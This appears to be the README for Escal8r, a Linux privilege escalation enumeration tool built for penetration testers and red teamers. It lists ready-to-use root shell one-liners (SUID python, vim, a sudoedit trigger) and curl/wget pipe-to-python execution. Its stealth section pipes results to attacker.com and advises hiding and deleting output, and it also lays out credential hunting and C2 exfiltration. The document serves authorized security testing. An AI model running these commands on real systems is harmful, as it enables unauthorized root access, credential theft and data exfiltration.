ESCAL8R

Unified Linux Privilege Escalation Enumeration Tool

A comprehensive, single-file privilege escalation enumeration script that combines the best features of LinEnum, LinPEAS, and AutoLocalPrivilegeEscalation into one weaponizable tool.

---

🎯 What is Escal8r?

Escal8r is a Linux privilege escalation enumeration tool designed for penetration testers and red teamers. It automatically scans a compromised Linux system to identify potential paths to gain root/administrator access.

Key Features

• ✅ Single File Deployment - Zero external dependencies, pure Python 3
• ✅ Curl-Pipe Ready - curl http://server.com/escal8r.py | python3
• ✅ Embedded Databases - All exploit databases built-in (no external files needed)
• ✅ Intelligent Matching - Automatic CVE detection for kernel, sudo, and capabilities
• ✅ Modern Attack Vectors - Container escapes, cloud metadata exploitation
• ✅ Color-Coded Output - Prioritized findings (CRITICAL/HIGH/MEDIUM/LOW)
• ✅ 139+ Enumeration Checks - Comprehensive coverage across 16 categories

---

🏗️ Architecture

┌─────────────────────────────────────────────────────────────┐
│                        escal8r.py                           │
│                  (96KB, Single Executable)                  │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  ┌──────────────────────────────────────────────────────┐   │
│  │           EMBEDDED JSON DATABASES (52KB)             │   │
│  ├──────────────────────────────────────────────────────┤   │
│  │  • data_gtfobins.json     - 100+ exploitable bins    │   │
│  │  • data_kernel_exploits   - 24 kernel CVEs           │   │
│  │  • data_sudo_exploits     - 10+ sudo vulnerabilities │   │
│  │  • data_capabilities.json - 23 Linux capabilities    │   │
│  └──────────────────────────────────────────────────────┘   │
│                          ↓                                  │
│  ┌──────────────────────────────────────────────────────┐   │
│  │        16 ENUMERATION CLASSES (139+ checks)          │   │
│  ├──────────────────────────────────────────────────────┤   │
│  │  SystemEnumerator         - Kernel, OS, security     │   │
│  │  UserEnumerator           - Users, groups, sudo      │   │
│  │  FileEnumerator           - SUID/SGID, capabilities  │   │
│  │  NetworkEnumerator        - Interfaces, ports        │   │
│  │  ProcessEnumerator        - Processes, cron, timers  │   │
│  │  ContainerEnumerator      - Docker, LXD, K8s         │   │
│  │  CloudEnumerator          - AWS, GCP, Azure          │   │
│  │  SoftwareEnumerator       - Compilers, databases     │   │
│  │  CredentialHunter         - SSH keys, API keys       │   │
│  │  EnvironmentEnumerator    - PATH, LD_PRELOAD         │   │
│  │  LegacyAuthEnumerator     - .rhosts, hosts.equiv     │   │
│  │  LogAndMailEnumerator     - Log/mail access          │   │
│  │  AdditionalSoftwareEnum   - Splunk, Jenkins, Log4j   │   │
│  │  TempAndCacheEnumerator   - /tmp, coredumps          │   │
│  │  ExploitMatcher           - CVE matching engine      │   │
│  │  Reporter                 - Summary generator        │   │
│  └──────────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────────┘

---

📚 Why Are There JSON Files in the Directory?

The JSON files in this repository are exploit databases that power Escal8r's intelligent analysis:

1. data_gtfobins.json (25KB)

Purpose: Maps 100+ Unix binaries to privilege escalation techniques

Why it exists: When Escal8r finds a SUID/SGID binary, it cross-references this database to determine if it's exploitable. For example:

• Finding /usr/bin/vim with SUID → Database provides: vim -c ':!/bin/sh'
• Finding /usr/bin/docker → Database suggests container escape techniques

Example Entry:

{
  "python": {
    "sudo": ["sudo python -c 'import os; os.system(\"/bin/bash\")'"],
    "suid": ["./python -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"],
    "capabilities": ["CAP_SETUID"],
    "shell": true
  }
}

2. data_kernel_exploits.json (12KB)

Purpose: Maps Linux kernel versions to known CVEs (2010-2023)

Why it exists: Escal8r extracts the running kernel version and checks if any public exploits exist. Contains 24 kernel exploits including:

• DirtyPipe (CVE-2022-0847)
• Dirty Cow (CVE-2016-5195)
• PwnKit (CVE-2021-4034)
• OverlayFS (CVE-2021-3493)
• LoonyTunables (CVE-2023-4911)

Example Entry:

{
  "name": "DirtyPipe",
  "cve": "CVE-2022-0847",
  "kernel_min": "5.8",
  "kernel_max": "5.16.11",
  "description": "Local privilege escalation via pipe buffer overwrite",
  "severity": "critical",
  "exploit_url": "https://haxx.in/files/dirtypipez.c"
}

3. data_sudo_exploits.json (6KB)

Purpose: Maps sudo versions to CVEs and dangerous configurations

Why it exists: Checks sudo version against 10+ known vulnerabilities and scans /etc/sudoers for dangerous patterns like:

• NOPASSWD: ALL entries
• LD_PRELOAD environment preservation
• (ALL, !root) bypass (CVE-2019-14287)

Example Entry:

{
  "name": "Baron Samedit",
  "cve": "CVE-2021-3156",
  "version_min": "1.8.2",
  "version_max": "1.8.31p2",
  "description": "Heap-based buffer overflow in sudo",
  "severity": "critical",
  "exploit_cmd": "sudoedit -s '\\' $(python3 -c 'print(\"A\"*1000)')"
}

4. data_capabilities.json (9KB)

Purpose: Maps Linux capabilities to exploitation techniques

Why it exists: Modern Linux uses capabilities instead of SUID for fine-grained privileges. This database maps 23 capabilities (like CAP_SETUID, CAP_DAC_OVERRIDE) to specific exploit commands.

Example Entry:

{
  "CAP_SETUID": {
    "severity": "critical",
    "description": "Make arbitrary manipulations of process UIDs",
    "exploit": "setuid(0) to gain root",
    "impact": "Direct root privilege escalation",
    "example": "python -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"
  }
}

🔄 How Databases Are Used

During Build:

# JSON files exist as separate files for maintenance
data_gtfobins.json
data_kernel_exploits.json
data_sudo_exploits.json
data_capabilities.json

During Deployment:

# JSON content is EMBEDDED into escal8r.py as Python strings
GTFOBINS_DB = r"""{"bash": {...}, "vim": {...}}"""
KERNEL_EXPLOITS_DB = r"""{"exploits": [...]}"""
SUDO_EXPLOITS_DB = r"""{"exploits": [...]}"""
CAPABILITIES_DB = r"""{"capabilities": {...}}"""

At Runtime:

# Databases are parsed from embedded strings
gtfobins = json.loads(GTFOBINS_DB)
kernel_db = json.loads(KERNEL_EXPLOITS_DB)
# No external files required!

---

🚀 Usage

Basic Execution

# Local execution
python3 escal8r.py

# Remote execution (no file transfer needed)
curl http://yourserver.com/escal8r.py | python3

# Or with wget
wget -qO- http://yourserver.com/escal8r.py | python3

# Save output to file
python3 escal8r.py > results.txt

Requirements

• Python: 3.6+ (Python 2 not supported)
• Dependencies: None (stdlib only)
• Privileges: Works as any user (more findings with root)
• OS: Linux (tested on Ubuntu, Debian, RHEL, CentOS)

---

🔍 What Escal8r Checks

Phase 1-14: Data Collection (139+ Checks)

System Information (8 checks)

• Kernel version and OS detection
• Hostname and architecture
• Security features (SELinux, AppArmor, ASLR)

User & Privilege Enumeration (15 checks)

• Current user, UID, groups
• Interesting group membership (docker, lxd, adm, disk, sudo)
• All system users and superuser accounts
• Passwordless sudo (sudo -n -l)
• Sudo version detection
• /etc/passwd, /etc/shadow accessibility
• Password hashes in /etc/passwd

File & Permission Analysis (10 checks)

• SUID files (find / -perm -4000) + GTFOBins matching
• SGID files (find / -perm -2000) + GTFOBins matching
• File capabilities (getcap -r /) + exploitation templates
• Writable system files (/etc/passwd, /etc/shadow, /etc/sudoers)
• World-writable SUID/SGID binaries
• NFS exports with no_root_squash
• /etc/fstab credential detection
• Mount options analysis (nosuid bypass)

Network Configuration (5 checks)

• Network interfaces (ifconfig/ip addr)
• Listening ports (netstat/ss)
• Routing table and ARP cache
• DNS configuration

Process & Service Enumeration (8 checks)

• Running processes and root processes
• Process binaries and permissions
• Cron jobs (/etc/cron*, /var/spool/cron)
• Writable cron scripts
• Systemd timers
• Anacron jobs

Container Detection (12 checks)

• Docker container detection (/.dockerenv, cgroups)
• Docker installed and socket access
• Docker group membership → CRITICAL
• Can list containers (docker ps)
• LXC/LXD detection
• LXD group membership → CRITICAL
• Kubernetes service account tokens
• Kubeconfig detection
• Container escape vector identification

Cloud Provider Detection (8 checks)

• AWS EC2 metadata service (169.254.169.254)
• AWS IAM role credentials → CRITICAL
• AWS Lambda detection
• AWS ECS detection
• Google Cloud Platform metadata
• Microsoft Azure metadata
• DigitalOcean metadata

Software Enumeration (15 checks)

• Compilers (gcc, python, perl, ruby, go, java)
• MySQL + default credential test
• PostgreSQL, MongoDB, Redis
• Apache version & config access
• Nginx version
• Git + .git directory scan
• Git credential detection

Credential Hunting (18 checks)

• SSH private keys (id_rsa, id_dsa, id_ecdsa, id_ed25519)
• SSH authorized_keys
• Command history files (.bash_history, .zsh_history)
• Password patterns in history
• Database configuration files
• .env files → HIGH PRIORITY
• AWS credentials (~/.aws/credentials) → CRITICAL
• API key pattern matching
• Backup files (*.bak, *.backup, *.old, *~)
• Sensitive backup detection

Environment Analysis (7 checks)

• Environment variables enumeration
• Sensitive data in env vars (password, secret, key, token)
• PATH writable directories → HIGH
• LD_PRELOAD detection
• LD_LIBRARY_PATH detection

Legacy Authentication (3 checks)

• hosts.equiv detection
• .rhosts file enumeration
• .plan file discovery

Log & Mail Analysis (5 checks)

• /var/log/ accessibility
• Readable log files (auth.log, secure, messages)
• Root mail access attempts

Additional Software Detection (8 checks)

• Splunk, Jenkins, Ansible
• Puppet, Chef, Vault (HashiCorp)
• Logstash configuration
• Log4j JAR detection (CVE-2021-44228)

Temporary Files & Cache (5 checks)

• /tmp and /dev/shm analysis
• Coredump discovery
• PHP session file enumeration

Phase 15: Intelligent Exploit Matching

Kernel Exploit Matching

# Extracts kernel version: 5.15.0
# Compares against 24 CVE ranges
# Output:
[CRITICAL] DirtyPipe (CVE-2022-0847)
  Local privilege escalation via pipe buffer overwrite
  Kernel range: 5.8 - 5.16.11
  [EXPLOIT]: https://haxx.in/files/dirtypipez.c

Sudo Exploit Matching

# Parses: Sudo version 1.8.31p2
# Matches against 10+ sudo CVEs
# Scans /etc/sudoers for patterns
# Output:
[CRITICAL] Baron Samedit (CVE-2021-3156)
  Heap-based buffer overflow in sudo
  Version range: 1.8.2 - 1.8.31p2
  [EXPLOIT]: https://github.com/blasty/CVE-2021-3156

Capability Exploit Matching

# Parses: /usr/bin/python3.8 = cap_setuid+ep
# Matches against 23 capabilities
# Provides ready-to-use exploit
# Output:
[CRITICAL] CAP_SETUID on /usr/bin/python3.8
  Make arbitrary manipulations of process UIDs
  Impact: Direct root privilege escalation
  [EXPLOIT]: python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

SUID/SGID + GTFOBins Matching

# Finds: -rwsr-xr-x /usr/bin/vim
# Cross-references GTFOBins database
# Output:
[CRITICAL] SUID binary with GTFOBins entry: /usr/bin/vim
  Can be exploited for privilege escalation
  [EXPLOIT]: vim -c ':!/bin/sh'

Phase 16: Executive Summary

╔═══════════════════════════════════════════════════════════╗
║                    EXECUTIVE SUMMARY                      ║
╚═══════════════════════════════════════════════════════════╝

Hostname: victim-server
Current User: www-data
Kernel: Linux 5.15.0-83-generic

CRITICAL Findings: 5
HIGH Findings: 12
MEDIUM Findings: 8
LOW Findings: 3

[✓] Enumeration complete!

---

🔄 How It Works: Execution Flow

┌─────────────────────────────────────────────────────────────┐
│  PHASE 1-14: ENUMERATION (Data Collection)                 │
├─────────────────────────────────────────────────────────────┤
│  • Runs 139+ checks across 14 enumeration classes          │
│  • Collects: files, processes, configs, credentials        │
│  • Stores findings in all_results dictionary               │
└─────────────────────────────────────────────────────────────┘
                            ↓
┌─────────────────────────────────────────────────────────────┐
│  PHASE 15: EXPLOIT MATCHING (Intelligent Analysis)         │
├─────────────────────────────────────────────────────────────┤
│  ┌─────────────────────────────────────────────────────┐   │
│  │ KERNEL EXPLOIT MATCHING                             │   │
│  │ • Extract kernel version (e.g., 5.15.0)             │   │
│  │ • Compare against 24 kernel CVE ranges              │   │
│  │ • Match: DirtyPipe, Dirty Cow, PwnKit, etc.         │   │
│  └─────────────────────────────────────────────────────┘   │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ SUDO EXPLOIT MATCHING                               │   │
│  │ • Parse sudo version (e.g., 1.9.13p2)               │   │
│  │ • Check against 10+ sudo CVEs                       │   │
│  │ • Scan sudoers for dangerous configs                │   │
│  │ • Detect: LD_PRELOAD, NOPASSWD, pwfeedback          │   │
│  └─────────────────────────────────────────────────────┘   │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ CAPABILITY EXPLOIT MATCHING                         │   │
│  │ • Parse getcap output for each binary               │   │
│  │ • Match against 23 dangerous capabilities           │   │
│  │ • Provide exploitation templates                    │   │
│  │ • Detect: CAP_SETUID, CAP_DAC_OVERRIDE, etc.        │   │
│  └─────────────────────────────────────────────────────┘   │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ SUID/SGID + GTFOBins MATCHING                       │   │
│  │ • Find all SUID/SGID binaries                       │   │
│  │ • Cross-reference with GTFOBins database            │   │
│  │ • Highlight: bash, vim, python, docker, etc.        │   │
│  │ • Provide ready-to-use exploitation commands        │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────────┘
                            ↓
┌─────────────────────────────────────────────────────────────┐
│  PHASE 16: REPORT GENERATION                                │
├─────────────────────────────────────────────────────────────┤
│  • Color-coded findings: CRITICAL/HIGH/MEDIUM/LOW           │
│  • Exploitation suggestions embedded with each finding      │
│  • Executive summary with finding counts                    │
└─────────────────────────────────────────────────────────────┘

---

📊 Coverage Statistics

Source Tool	Checks	Coverage
LinEnum	60+	~98%
LinPEAS	147+	~85%
AutoLocalPE	24	100%
Total Unique	180+	~92-95%

---

🎨 Output Format

Findings are color-coded by severity:

• 🔴 CRITICAL (Red) - Direct privilege escalation paths
• 🟡 HIGH (Yellow) - Likely exploitation vectors
• 🔵 MEDIUM (Blue) - Potential security issues
• 🔵 LOW (Cyan) - Informational findings

Each finding includes:

• Title - What was found
• Description - Why it's dangerous
• Exploit - Ready-to-use command or URL

---

🛡️ Operational Security

Stealth Considerations

Low Footprint:

• No compilation required
• No external files created (unless redirected)
• Runs entirely in memory
• Execution time: ~2-3 minutes

Detection Risks:

• SUID/SGID file searches trigger filesystem scans
• Capability checks require getcap (may not be installed)
• Network metadata queries create HTTP requests (cloud)
• EDR/AV may flag enumeration behavior

Best Practices:

# Run with output redirection to avoid terminal artifacts
python3 escal8r.py > /tmp/.hidden_results.txt

# Clean up after execution
rm /tmp/.hidden_results.txt

# Or pipe directly to remote exfiltration
python3 escal8r.py | curl -X POST -d @- https://attacker.com/upload

---

🔧 Development & Customization

Project Structure

Escal8r/
├── escal8r.py                        # Main executable (96KB, 2,740 lines)
├── data_gtfobins.json                # GTFOBins database (25KB)
├── data_kernel_exploits.json         # Kernel CVE database (12KB)
├── data_sudo_exploits.json           # Sudo vulnerability database (6KB)
├── data_capabilities.json            # Capabilities database (9KB)
├── MASTER_ENUMERATION_MATRIX.md      # Complete check mapping (33KB)
├── LINPEAS_ENUMERATION_CATALOG.md    # LinPEAS analysis (54KB)
├── STATUS_REPORT.md                  # Project status
└── README.md                         # This file

Adding Custom Checks

To add new enumeration checks:

1. Create/Edit an Enumerator Class:

class CustomEnumerator:
    def __init__(self):
        self.results = {}

    def check_custom_vulnerability(self):
        """Check for custom vulnerability"""
        # Your enumeration logic here
        result = run_cmd("your_command_here")

        if suspicious_condition:
            print_finding("CRITICAL",
                        "Custom Finding Title",
                        "Description of the issue",
                        "Exploitation command or URL")
            self.results['custom_vuln'] = result

        return self.results

2. Integrate into main():

def main():
    # ... existing phases ...

    # Phase N: Custom checks
    custom_enum = CustomEnumerator()
    all_results.update(custom_enum.check_custom_vulnerability())

Updating Exploit Databases

To update the embedded databases:

1. Edit the JSON files:

vim data_kernel_exploits.json
# Add new CVE entry

2. Rebuild escal8r.py (if databases are separate):

# The databases are already embedded in escal8r.py
# If you need to re-embed, update the GTFOBINS_DB, KERNEL_EXPLOITS_DB, etc. variables

---

🎯 Use Cases

1. Penetration Testing

# After gaining initial foothold (web shell, RCE):
wget http://yourserver.com/escal8r.py -O /tmp/e.py && python3 /tmp/e.py

2. CTF Competitions

# Quick privilege escalation enumeration:
curl http://10.10.14.5/escal8r.py | python3 | grep -E "CRITICAL|HIGH"

3. Red Team Operations

# Automated enumeration in C2 framework:
execute-assembly escal8r.py > /tmp/.results
# Exfiltrate /tmp/.results via C2 channel

4. Security Auditing

# Defensive use - find privilege escalation risks:
python3 escal8r.py > audit_report_$(hostname)_$(date +%Y%m%d).txt

---

⚠️ Legal Disclaimer

IMPORTANT: This tool is designed for authorized security testing only.

• ✅ Use on systems you own or have explicit permission to test
• ✅ Use in controlled CTF/lab environments
• ✅ Use for authorized penetration testing engagements
• ❌ Do NOT use on systems without authorization
• ❌ Unauthorized access to computer systems is illegal

The authors assume no liability for misuse or illegal use of this tool.

---

🤝 Contributing

Contributions are welcome! Areas for improvement:

• Add more kernel exploits (2024+ CVEs)
• Expand GTFOBins database
• Add Windows compatibility layer
• Build pure Bash version (no Python required)
• Add ACL and extended attribute checks
• Improve container escape detection
• Add Active Directory enumeration for Linux-joined systems

---

📜 Credits

Escal8r combines techniques and databases from:

• LinEnum by rebootuser
• LinPEAS by Carlos Polop
• AutoLocalPrivilegeEscalation by ngalongc
• GTFOBins by GTFOBins Team
• HackTricks by Carlos Polop

---

📈 Version History

v1.0.0 (2025-11-06)

• ✅ Initial release
• ✅ 139+ enumeration checks
• ✅ 16 enumeration classes
• ✅ Kernel, sudo, and capability exploit matching
• ✅ GTFOBins integration
• ✅ Container and cloud detection
• ✅ Single-file deployment

---

📧 Contact

For bug reports, feature requests, or questions:

• GitHub Issues: Create an issue
• Project Repository: Escal8r on GitHub

---

Happy Hunting! 🎯